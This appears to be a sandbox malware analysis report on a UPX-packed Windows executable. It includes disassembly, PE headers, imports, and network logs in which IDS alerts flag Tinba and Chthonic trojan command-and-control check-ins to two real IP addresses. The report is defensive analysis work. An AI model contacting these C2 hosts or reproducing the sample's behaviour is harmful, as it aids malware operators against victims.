                                                                                                                                                                                        mov word ptr [ebp-22h], 2D5Bh
                                                                                                                                                                                        mov edx, dword ptr [ebp-20h]
                                                                                                                                                                                        mov dword ptr [ebp-28h], 00000007h
                                                                                                                                                                                        mov esi, dword ptr [ebp-28h]
                                                                                                                                                                                        mov byte ptr [ebp-2Dh], 00000052h
                                                                                                                                                                                        mov bl, byte ptr [ebp-2Dh]
                                                                                                                                                                                        mov word ptr [ebp-30h], 796Dh
                                                                                                                                                                                        mov byte ptr [ebp-09h], bl
                                                                                                                                                                                        mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                        mov dword ptr [0040DD44h], eax
                                                                                                                                                                                        lea eax, dword ptr [ebp+04h]
                                                                                                                                                                                        mov dword ptr [0040DD48h], eax
                                                                                                                                                                                        mov dword ptr [esp], esi
                                                                                                                                                                                        mov dword ptr [ebp-34h], eax
                                                                                                                                                                                        mov dword ptr [ebp-38h], ecx
                                                                                                                                                                                        mov dword ptr [ebp-3Ch], edx
                                                                                                                                                                                        call 00007F922D58E41Eh
                                                                                                                                                                                        mov ecx, dword ptr [ebp-3Ch]
                                                                                                                                                                                        cmp eax, ecx
                                                                                                                                                                                        je 00007F922D58E85Eh
                                                                                                                                                                                        mov ax, 0000h
                                                                                                                                                                                        mov cx, word ptr [ebp-30h]
                                                                                                                                                                                        mov dx, ax
                                                                                                                                                                                        sub dx, word ptr [ebp-30h]
                                                                                                                                                                                        mov word ptr [ebp-30h], dx
                                                                                                                                                                                        sub ax, word ptr [ebp-30h]
                                                                                                                                                                                        or cx, 1256h
                                                                                                                                                                                        mov word ptr [ebp-30h], cx
                                                                                                                                                                                        mov word ptr [ebp-22h], ax
                                                                                                                                                                                        mov esi, dword ptr [ebp-38h]
                                                                                                                                                                                        mov dword ptr [ebp-14h], esi
                                                                                                                                                                                        jmp 00007F922D58E844h
                                                                                                                                                                                        mov ax, 0000h
                                                                                                                                                                                        mov ecx, dword ptr [ebp-34h]
                                                                                                                                                                                        mov dword ptr [ebp-14h], ecx
                                                                                                                                                                                        sub ax, word ptr [ebp-22h]
                                                                                                                                                                                        mov word ptr [ebp-22h], ax
                                                                                                                                                                                        mov eax, dword ptr [ebp-14h]
                                                                                                                                                                                        mov cx, word ptr [ebp-22h]
                                                                                                                                                                                        and cx, 0673h
                                                                                                                                                                                        mov word ptr [ebp-22h], cx
                                                                                                                                                                                        add esp, 38h
                                                                                                                                                                                        pop esi
                                                                                                                                                                                        pop ebx
                                                                                                                                                                                        pop ebp
                                                                                                                                                                                        ret
                                                                                                                                                                                        add byte ptr [eax], al

                                                                                                                                                                                        Rich Headers

                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                        • [ASM] VS2005 build 50727
                                                                                                                                                                                        • [ C ] VS2005 build 50727
                                                                                                                                                                                        • [IMP] VS2005 build 50727
                                                                                                                                                                                        • [C++] VS2005 build 50727
                                                                                                                                                                                        • [RES] VS2005 build 50727
                                                                                                                                                                                        • [LNK] VS2005 build 50727

                                                                                                                                                                                        Data Directories

                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1d0000x8c.imports
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1c0000xd58.rsrc
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                        Sections

                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                        UPX00x10000x100000xf600False0.4557768038617886DOS executable (COM)4.895667733918766IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                        UPX10x110000xb0000xb000False0.3611505681818182data5.633049275866229IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                        .rsrc0x1c0000x10000x1000False0.318359375data3.483060593097884IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                        .imports0x1d0000x10000xc00False0.421875data4.436376811230836IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                        Resources

                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                        RT_ICON0x1c2fc0x668Device independent bitmap graphic, 48 x 96 x 4, image size 00.21890243902439024
                                                                                                                                                                                        RT_ICON0x118a00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 00.3400537634408602
                                                                                                                                                                                        RT_ICON0x11b980x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 00.35450819672131145
                                                                                                                                                                                        RT_ICON0x11d900x128Device independent bitmap graphic, 16 x 32 x 4, image size 00.46283783783783783
                                                                                                                                                                                        RT_ICON0x11ec80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.5026652452025586
                                                                                                                                                                                        RT_ICON0x12d800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.5798736462093863
                                                                                                                                                                                        RT_ICON0x136380x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.40264976958525345
                                                                                                                                                                                        RT_ICON0x13d100x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.3273121387283237
                                                                                                                                                                                        RT_ICON0x142880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.27344398340248965
                                                                                                                                                                                        RT_ICON0x168400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.37875234521575984
                                                                                                                                                                                        RT_ICON0x178f80x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.37868852459016394
                                                                                                                                                                                        RT_ICON0x182900x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.4796099290780142
                                                                                                                                                                                        RT_GROUP_ICON0x1c9680xaedata0.5919540229885057
                                                                                                                                                                                        RT_VERSION0x1ca1c0x33cdata0.47342995169082125

                                                                                                                                                                                        Imports

                                                                                                                                                                                        DLLImport
                                                                                                                                                                                        GDI32.dllGetDeviceCaps
                                                                                                                                                                                        KERNEL32.DLLAddAtomW, FreeConsole, GetCurrencyFormatW, IsProcessorFeaturePresent, CreateEventA, OpenFileMappingW, LocalHandle, HeapSize, MulDiv, WriteFile, GetTempFileNameW, SetLocaleInfoW, DosDateTimeToFileTime, EnumLanguageGroupLocalesW, CreatePipe, GetPrivateProfileSectionNamesA, SetConsoleTitleA, CancelDeviceWakeupRequest, GetVolumePathNameA, GetProfileIntA, GetDateFormatA, DebugBreak, SuspendThread, SetCommMask, EnumUILanguagesW, MoveFileWithProgressA, BackupRead, GetNumberOfConsoleInputEvents, GetLongPathNameA, FreeLibrary, GetFileAttributesW, EnumDateFormatsA, QueryDosDeviceA, UpdateResourceW, WritePrivateProfileStructA, lstrcpynA, GetExitCodeProcess, GlobalAddAtomW, GetShortPathNameW, UnlockFileEx, SetComputerNameExA, GetExitCodeProcess
                                                                                                                                                                                        WINMM.dlltimeSetEvent, waveOutOpen, midiConnect, midiOutSetVolume, mmioOpenA, mmioWrite, DrvGetModuleHandle, mciGetDeviceIDFromElementIDW, waveOutGetErrorTextW, joyGetPosEx, mixerSetControlDetails, joySetThreshold, mmioRead, waveOutGetDevCapsA, DefDriverProc, mmioDescend, mixerGetLineInfoA, mciSendStringA, midiOutClose, midiInGetDevCapsW, midiStreamOut, mmioSetBuffer, midiInClose, waveOutReset, midiOutPrepareHeader, waveInGetPosition, GetDriverModuleHandle, mmioGetInfo, midiInMessage, mciGetCreatorTask, auxGetVolume, joyGetDevCapsW, waveInGetErrorTextA, mixerGetLineControlsW
                                                                                                                                                                                        mscms.dllGetColorProfileElement, UninstallColorProfileA, AssociateColorProfileWithDeviceA, EnumColorProfilesW, GetStandardColorSpaceProfileW, DisassociateColorProfileFromDeviceW, GetStandardColorSpaceProfileA, SetStandardColorSpaceProfileW, DeleteColorTransform, GetPS2ColorRenderingIntent, SetColorProfileHeader, TranslateBitmapBits, CreateColorTransformA, ConvertIndexToColorName, CreateProfileFromLogColorSpaceW, RegisterCMMW, GetColorProfileElementTag, GetColorProfileFromHandle, UninstallColorProfileW, CreateMultiProfileTransform, GetCountColorProfileElements, InstallColorProfileA, CreateColorTransformW, CheckColors, SetColorProfileElementReference
                                                                                                                                                                                        msvcrt.dlliswprint, _wgetenv, srand, strtok, iswupper, tolower, fputs, _swab, wcsncpy, _fputchar, iswctype, _strupr, bsearch, _strnicmp, memcmp, _wspawnl, _abnormal_termination, _rotl, _flsbuf, isdigit, memmove, _isctype, isalpha, isgraph, _wspawnvpe, _wexecve, _wcslwr, _wcsrev, fputwc, _fcvt, _ultoa, tmpnam, _wcreat
                                                                                                                                                                                        ole32.dllOleCreateFromData, HWND_UserMarshal, CreateAntiMoniker, CoInitialize, CoSetProxyBlanket, CoDisconnectObject, ReleaseStgMedium, HGLOBAL_UserSize, PropStgNameToFmtId

                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                        Snort IDS Alerts

                                                                                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                        192.168.2.4216.218.185.16249742802020418 12/22/23-21:31:45.756024TCP2020418ET TROJAN Tinba Checkin 24974280192.168.2.4216.218.185.162
                                                                                                                                                                                        192.168.2.4216.218.185.16249745802830613 12/22/23-21:31:50.428588TCP2830613ETPRO TROJAN W32/Chthonic CnC Activity4974580192.168.2.4216.218.185.162
                                                                                                                                                                                        192.168.2.4216.218.185.16249748802830613 12/22/23-21:31:53.740170TCP2830613ETPRO TROJAN W32/Chthonic CnC Activity4974880192.168.2.4216.218.185.162
                                                                                                                                                                                        192.168.2.4216.218.185.16249745802020418 12/22/23-21:31:50.428588TCP2020418ET TROJAN Tinba Checkin 24974580192.168.2.4216.218.185.162
                                                                                                                                                                                        192.168.2.4216.218.185.16249745802024659 12/22/23-21:31:50.428588TCP2024659ET TROJAN [PTsecurity] Tinba Checkin 44974580192.168.2.4216.218.185.162
                                                                                                                                                                                        192.168.2.4216.218.185.16249739802020418 12/22/23-21:31:41.115704TCP2020418ET TROJAN Tinba Checkin 24973980192.168.2.4216.218.185.162
                                                                                                                                                                                        192.168.2.4216.218.185.16249739802024659 12/22/23-21:31:41.115704TCP2024659ET TROJAN [PTsecurity] Tinba Checkin 44973980192.168.2.4216.218.185.162
                                                                                                                                                                                        192.168.2.4216.218.185.16249748802024659 12/22/23-21:31:53.740170TCP2024659ET TROJAN [PTsecurity] Tinba Checkin 44974880192.168.2.4216.218.185.162
                                                                                                                                                                                        192.168.2.4216.218.185.16249748802020418 12/22/23-21:31:53.740170TCP2020418ET TROJAN Tinba Checkin 24974880192.168.2.4216.218.185.162
                                                                                                                                                                                        192.168.2.4216.218.185.16249737802020418 12/22/23-21:31:38.006819TCP2020418ET TROJAN Tinba Checkin 24973780192.168.2.4216.218.185.162
                                                                                                                                                                                        192.168.2.4216.218.185.16249746802024659 12/22/23-21:31:52.053475TCP2024659ET TROJAN [PTsecurity] Tinba Checkin 44974680192.168.2.4216.218.185.162
                                                                                                                                                                                        192.168.2.4216.218.185.16249740802024659 12/22/23-21:31:42.585880TCP2024659ET TROJAN [PTsecurity] Tinba Checkin 44974080192.168.2.4216.218.185.162
                                                                                                                                                                                        192.168.2.4216.218.185.16249743802024659 12/22/23-21:31:47.490220TCP2024659ET TROJAN [PTsecurity] Tinba Checkin 44974380192.168.2.4216.218.185.162
                                                                                                                                                                                        192.168.2.4216.218.185.16249741802020418 12/22/23-21:31:44.432614TCP2020418ET TROJAN Tinba Checkin 24974180192.168.2.4216.218.185.162
                                                                                                                                                                                        192.168.2.4216.218.185.16249743802020418 12/22/23-21:31:47.490220TCP2020418ET TROJAN Tinba Checkin 24974380192.168.2.4216.218.185.162
                                                                                                                                                                                        192.168.2.445.77.249.7949736802024659 12/22/23-21:31:35.805907TCP2024659ET TROJAN [PTsecurity] Tinba Checkin 44973680192.168.2.445.77.249.79
                                                                                                                                                                                        192.168.2.445.77.249.7949736802020418 12/22/23-21:31:35.805907TCP2020418ET TROJAN Tinba Checkin 24973680192.168.2.445.77.249.79
                                                                                                                                                                                        192.168.2.4216.218.185.16249739802830613 12/22/23-21:31:41.115704TCP2830613ETPRO TROJAN W32/Chthonic CnC Activity4973980192.168.2.4216.218.185.162
                                                                                                                                                                                        192.168.2.4216.218.185.16249737802024659 12/22/23-21:31:38.006819TCP2024659ET TROJAN [PTsecurity] Tinba Checkin 44973780192.168.2.4216.218.185.162
                                                                                                                                                                                        192.168.2.4216.218.185.16249746802020418 12/22/23-21:31:52.053475TCP2020418ET TROJAN Tinba Checkin 24974680192.168.2.4216.218.185.162
                                                                                                                                                                                        192.168.2.4216.218.185.16249738802024659 12/22/23-21:31:39.602700TCP2024659ET TROJAN [PTsecurity] Tinba Checkin 44973880192.168.2.4216.218.185.162
                                                                                                                                                                                        192.168.2.4216.218.185.16249743802830613 12/22/23-21:31:47.490220TCP2830613ETPRO TROJAN W32/Chthonic CnC Activity4974380192.168.2.4216.218.185.162
                                                                                                                                                                                        192.168.2.4216.218.185.16249738802020418 12/22/23-21:31:39.602700TCP2020418ET TROJAN Tinba Checkin 24973880192.168.2.4216.218.185.162
                                                                                                                                                                                        192.168.2.4216.218.185.16249744802024659 12/22/23-21:31:48.965379TCP2024659ET TROJAN [PTsecurity] Tinba Checkin 44974480192.168.2.4216.218.185.162
                                                                                                                                                                                        192.168.2.4216.218.185.16249741802024659 12/22/23-21:31:44.432614TCP2024659ET TROJAN [PTsecurity] Tinba Checkin 44974180192.168.2.4216.218.185.162
                                                                                                                                                                                        192.168.2.4216.218.185.16249735802020418 12/22/23-21:31:19.712756TCP2020418ET TROJAN Tinba Checkin 24973580192.168.2.4216.218.185.162
                                                                                                                                                                                        192.168.2.4216.218.185.16249740802020418 12/22/23-21:31:42.585880TCP2020418ET TROJAN Tinba Checkin 24974080192.168.2.4216.218.185.162
                                                                                                                                                                                        192.168.2.4216.218.185.16249735802024659 12/22/23-21:31:19.712756TCP2024659ET TROJAN [PTsecurity] Tinba Checkin 44973580192.168.2.4216.218.185.162
                                                                                                                                                                                        192.168.2.4216.218.185.16249744802020418 12/22/23-21:31:48.965379TCP2020418ET TROJAN Tinba Checkin 24974480192.168.2.4216.218.185.162
                                                                                                                                                                                        192.168.2.4216.218.185.16249737802830613 12/22/23-21:31:38.006819TCP2830613ETPRO TROJAN W32/Chthonic CnC Activity4973780192.168.2.4216.218.185.162
                                                                                                                                                                                        192.168.2.445.77.249.7949736802830613 12/22/23-21:31:35.805907TCP2830613ETPRO TROJAN W32/Chthonic CnC Activity4973680192.168.2.445.77.249.79
                                                                                                                                                                                        192.168.2.4216.218.185.16249742802024659 12/22/23-21:31:45.756024TCP2024659ET TROJAN [PTsecurity] Tinba Checkin 44974280192.168.2.4216.218.185.162
                                                                                                                                                                                        192.168.2.4216.218.185.16249741802830613 12/22/23-21:31:44.432614TCP2830613ETPRO TROJAN W32/Chthonic CnC Activity4974180192.168.2.4216.218.185.162

                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                        Dec 22, 2023 21:30:50.759562016 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                                                        Dec 22, 2023 21:31:00.366753101 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                                                        Dec 22, 2023 21:31:11.238784075 CET49672443192.168.2.4173.222.162.32
                                                                                                                                                                                        Dec 22, 2023 21:31:11.239866018 CET49729443192.168.2.4173.222.162.32
                                                                                                                                                                                        Dec 22, 2023 21:31:11.239916086 CET44349729173.222.162.32192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:11.239984035 CET49729443192.168.2.4173.222.162.32
                                                                                                                                                                                        Dec 22, 2023 21:31:11.241337061 CET49729443192.168.2.4173.222.162.32
                                                                                                                                                                                        Dec 22, 2023 21:31:11.241358995 CET44349729173.222.162.32192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:11.538502932 CET49672443192.168.2.4173.222.162.32
                                                                                                                                                                                        Dec 22, 2023 21:31:11.671864986 CET44349729173.222.162.32192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:11.671931982 CET49729443192.168.2.4173.222.162.32
                                                                                                                                                                                        Dec 22, 2023 21:31:12.147861958 CET49672443192.168.2.4173.222.162.32
                                                                                                                                                                                        Dec 22, 2023 21:31:12.761574030 CET49729443192.168.2.4173.222.162.32
                                                                                                                                                                                        Dec 22, 2023 21:31:12.761614084 CET44349729173.222.162.32192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:12.761971951 CET44349729173.222.162.32192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:12.762032032 CET49729443192.168.2.4173.222.162.32
                                                                                                                                                                                        Dec 22, 2023 21:31:12.762510061 CET49729443192.168.2.4173.222.162.32
                                                                                                                                                                                        Dec 22, 2023 21:31:12.762540102 CET44349729173.222.162.32192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:12.838124990 CET49729443192.168.2.4173.222.162.32
                                                                                                                                                                                        Dec 22, 2023 21:31:12.838150978 CET44349729173.222.162.32192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:13.267890930 CET44349729173.222.162.32192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:13.268115044 CET49729443192.168.2.4173.222.162.32
                                                                                                                                                                                        Dec 22, 2023 21:31:13.268309116 CET44349729173.222.162.32192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:13.268316031 CET49729443192.168.2.4173.222.162.32
                                                                                                                                                                                        Dec 22, 2023 21:31:13.268342972 CET49729443192.168.2.4173.222.162.32
                                                                                                                                                                                        Dec 22, 2023 21:31:13.268362999 CET44349729173.222.162.32192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:13.268387079 CET49729443192.168.2.4173.222.162.32
                                                                                                                                                                                        Dec 22, 2023 21:31:13.268403053 CET49729443192.168.2.4173.222.162.32
                                                                                                                                                                                        Dec 22, 2023 21:31:13.351030111 CET49672443192.168.2.4173.222.162.32
                                                                                                                                                                                        Dec 22, 2023 21:31:15.757338047 CET49672443192.168.2.4173.222.162.32
                                                                                                                                                                                        Dec 22, 2023 21:31:18.595140934 CET4973580192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:18.796396971 CET8049735216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:18.796514988 CET4973580192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:19.712755919 CET4973580192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:19.914051056 CET8049735216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:19.914130926 CET4973580192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:20.115340948 CET8049735216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:20.115583897 CET8049735216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:20.115699053 CET8049735216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:20.115786076 CET4973580192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:20.569731951 CET49672443192.168.2.4173.222.162.32
                                                                                                                                                                                        Dec 22, 2023 21:31:20.779464960 CET4973580192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:20.980840921 CET8049735216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:30.179114103 CET49672443192.168.2.4173.222.162.32
                                                                                                                                                                                        Dec 22, 2023 21:31:35.436757088 CET4973680192.168.2.445.77.249.79
                                                                                                                                                                                        Dec 22, 2023 21:31:35.802743912 CET804973645.77.249.79192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:35.803150892 CET4973680192.168.2.445.77.249.79
                                                                                                                                                                                        Dec 22, 2023 21:31:35.805907011 CET4973680192.168.2.445.77.249.79
                                                                                                                                                                                        Dec 22, 2023 21:31:36.169893026 CET804973645.77.249.79192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:36.170080900 CET4973680192.168.2.445.77.249.79
                                                                                                                                                                                        Dec 22, 2023 21:31:36.534226894 CET804973645.77.249.79192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:36.754365921 CET804973645.77.249.79192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:36.754401922 CET804973645.77.249.79192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:36.755017996 CET4973680192.168.2.445.77.249.79
                                                                                                                                                                                        Dec 22, 2023 21:31:36.755017996 CET4973680192.168.2.445.77.249.79
                                                                                                                                                                                        Dec 22, 2023 21:31:37.119350910 CET804973645.77.249.79192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:37.804647923 CET4973780192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:38.006325960 CET8049737216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:38.006567955 CET4973780192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:38.006819010 CET4973780192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:38.208348989 CET8049737216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:38.208678007 CET4973780192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:38.416351080 CET8049737216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:38.416371107 CET8049737216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:38.416402102 CET8049737216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:38.416735888 CET4973780192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:38.416865110 CET4973780192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:38.619069099 CET8049737216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:39.398689985 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:39.602485895 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:39.602567911 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:39.602699995 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:39.807838917 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:39.807910919 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:40.013670921 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:40.013947964 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:40.013961077 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:40.014209032 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:40.016026974 CET4973880192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:40.218029022 CET8049738216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:40.914036036 CET4973980192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:41.115379095 CET8049739216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:41.115467072 CET4973980192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:41.115704060 CET4973980192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:41.316739082 CET8049739216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:41.316890955 CET4973980192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:41.518258095 CET8049739216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:41.519004107 CET8049739216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:41.519038916 CET8049739216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:41.519419909 CET4973980192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:41.519617081 CET4973980192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:41.726632118 CET8049739216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:42.383488894 CET4974080192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:42.585366964 CET8049740216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:42.585551023 CET4974080192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:42.585880041 CET4974080192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:42.787254095 CET8049740216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:42.787332058 CET4974080192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:42.988810062 CET8049740216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:42.989285946 CET8049740216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:42.989300013 CET8049740216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:42.989473104 CET4974080192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:42.989773035 CET4974080192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:43.191124916 CET8049740216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:44.230259895 CET4974180192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:44.432301998 CET8049741216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:44.432403088 CET4974180192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:44.432614088 CET4974180192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:44.637361050 CET8049741216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:44.637525082 CET4974180192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:44.839313984 CET8049741216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:44.839683056 CET8049741216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:44.839696884 CET8049741216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:44.839868069 CET4974180192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:44.840142965 CET4974180192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:45.041290998 CET8049741216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:45.554696083 CET4974280192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:45.755778074 CET8049742216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:45.755985022 CET4974280192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:45.756023884 CET4974280192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:45.958229065 CET8049742216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:45.958293915 CET4974280192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:46.159310102 CET8049742216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:46.159543037 CET8049742216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:46.159554958 CET8049742216.218.185.162192.168.2.4
                                                                                                                                                                                        Dec 22, 2023 21:31:46.160032034 CET4974280192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:46.160201073 CET4974280192.168.2.4216.218.185.162
                                                                                                                                                                                        Dec 22, 2023 21:31:46.363837004 CET8049742216.218.185.162192.168.2.4
